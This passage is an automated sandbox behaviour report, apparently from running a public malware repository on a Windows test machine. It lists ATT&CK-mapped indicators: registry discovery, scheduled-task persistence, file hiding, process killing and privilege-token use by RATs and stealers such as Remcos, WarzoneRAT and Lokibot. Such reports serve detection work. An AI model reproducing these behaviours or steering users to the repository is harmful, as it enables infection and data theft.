Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3832	3080	WerFault.exe	103

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winlog.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Remcos.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5364	PING.EXE

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Delays execution with timeout.exe 6 IoCs

defense_evasion

pid	Process
7152	timeout.exe
1380	timeout.exe
6828	timeout.exe
4564	timeout.exe
1080	timeout.exe
7128	timeout.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1368	ipconfig.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
348	taskkill.exe
6168	taskkill.exe
6544	taskkill.exe
6312	taskkill.exe
2700	taskkill.exe

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Blackkomet.exe
Key created	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-580533235-1933962784-2718464258-1000_Classes\MIME\Database	winit.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
5436	reg.exe
5124	reg.exe
6228	reg.exe

NTFS ADS 5 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\jFvfxe.exe\:Zone.Identifier:$DATA	WarzoneRAT.exe
File created	C:\THE_HEURISTIC_OF_NORTON_IS_VERY_BAD_AND_PRODUCE:POSITIVES-FALSES	WScript.exe
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe
File opened for modification	C:\Users\Admin\Downloads\The-MALWARE-Repo-master.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\{11562E80-F349-4775-A7C3-94C766D00AD2}\8tr.exe:Zone.Identifier	WINWORD.EXE

Runs .reg file with regedit 2 IoCs

pid	Process
1576	regedit.exe
7116	regedit.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5364	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5524	schtasks.exe
6792	schtasks.exe
1648	schtasks.exe
7024	schtasks.exe
6832	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 4 IoCs

pid	Process
3060	WINWORD.EXE
3060	WINWORD.EXE
4648	WINWORD.EXE
4648	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3120	msedge.exe
3120	msedge.exe
4948	msedge.exe
4948	msedge.exe
1692	msedge.exe
1692	msedge.exe
3544	identity_helper.exe
3544	identity_helper.exe
2932	msedge.exe
2932	msedge.exe
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe
3048	Opaserv.l.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
5560	iexplore.exe
6876	taskhostw.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
680	Process not Found
680	Process not Found
680	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs

pid	Process
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
852	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeDebugPrivilege	3048	Opaserv.l.exe
Token: SeDebugPrivilege	1188	msload.exe
Token: SeShutdownPrivilege	1188	msload.exe
Token: SeIncreaseQuotaPrivilege	4832	Blackkomet.exe
Token: SeSecurityPrivilege	4832	Blackkomet.exe
Token: SeTakeOwnershipPrivilege	4832	Blackkomet.exe
Token: SeLoadDriverPrivilege	4832	Blackkomet.exe
Token: SeSystemProfilePrivilege	4832	Blackkomet.exe
Token: SeSystemtimePrivilege	4832	Blackkomet.exe
Token: SeProfSingleProcessPrivilege	4832	Blackkomet.exe
Token: SeIncBasePriorityPrivilege	4832	Blackkomet.exe
Token: SeCreatePagefilePrivilege	4832	Blackkomet.exe
Token: SeBackupPrivilege	4832	Blackkomet.exe
Token: SeRestorePrivilege	4832	Blackkomet.exe
Token: SeShutdownPrivilege	4832	Blackkomet.exe
Token: SeDebugPrivilege	4832	Blackkomet.exe
Token: SeSystemEnvironmentPrivilege	4832	Blackkomet.exe
Token: SeChangeNotifyPrivilege	4832	Blackkomet.exe
Token: SeRemoteShutdownPrivilege	4832	Blackkomet.exe
Token: SeUndockPrivilege	4832	Blackkomet.exe
Token: SeManageVolumePrivilege	4832	Blackkomet.exe
Token: SeImpersonatePrivilege	4832	Blackkomet.exe
Token: SeCreateGlobalPrivilege	4832	Blackkomet.exe
Token: 33	4832	Blackkomet.exe
Token: 34	4832	Blackkomet.exe
Token: 35	4832	Blackkomet.exe
Token: 36	4832	Blackkomet.exe
Token: SeDebugPrivilege	6396	WarzoneRAT.exe
Token: SeDebugPrivilege	7124	Lokibot.exe
Token: SeDebugPrivilege	1460	rutserv.exe
Token: SeDebugPrivilege	5844	rutserv.exe
Token: SeTakeOwnershipPrivilege	5592	rutserv.exe
Token: SeTcbPrivilege	5592	rutserv.exe
Token: SeTcbPrivilege	5592	rutserv.exe
Token: SeDebugPrivilege	6168	taskkill.exe
Token: SeDebugPrivilege	6544	taskkill.exe
Token: SeDebugPrivilege	5232	powershell.exe
Token: SeDebugPrivilege	6312	taskkill.exe
Token: SeAuditPrivilege	7028	svchost.exe
Token: SeDebugPrivilege	2700	taskkill.exe
Token: SeDebugPrivilege	348	taskkill.exe
Token: SeDebugPrivilege	2200	RDPWInst.exe
Token: SeAuditPrivilege	5660	svchost.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe
4948	msedge.exe

Suspicious use of SetWindowsHookEx 30 IoCs

pid	Process
2892	Prolin.exe
3520	Quamo.exe
3060	WINWORD.EXE
3060	WINWORD.EXE
3060	WINWORD.EXE
3060	WINWORD.EXE
3060	WINWORD.EXE
3060	WINWORD.EXE
3060	WINWORD.EXE
4648	WINWORD.EXE
4648	WINWORD.EXE
4648	WINWORD.EXE
4648	WINWORD.EXE
4648	WINWORD.EXE
5560	iexplore.exe
6728	Azorult.exe
6504	wini.exe
6600	winit.exe
1460	rutserv.exe
1556	rutserv.exe
5844	rutserv.exe
5592	rutserv.exe
684	cheat.exe
2364	ink.exe
5164	taskhost.exe
6516	P.exe
2932	R8.exe
6092	winlogon.exe
6876	taskhostw.exe
6648	winlogon.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4948 wrote to memory of 436	4948	msedge.exe	77
PID 4948 wrote to memory of 436	4948	msedge.exe	77
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 1280	4948	msedge.exe	78
PID 4948 wrote to memory of 3120	4948	msedge.exe	79
PID 4948 wrote to memory of 3120	4948	msedge.exe	79
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80
PID 4948 wrote to memory of 4308	4948	msedge.exe	80

Views/modifies file attributes 1 TTPs 8 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
644	attrib.exe
6096	attrib.exe
6048	attrib.exe
5128	attrib.exe
644	attrib.exe
544	attrib.exe
5168	attrib.exe
1860	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Da2dalus/The-MALWARE-Repo
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff88b483cb8,0x7ff88b483cc8,0x7ff88b483cd8
  2⤵
  PID:436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
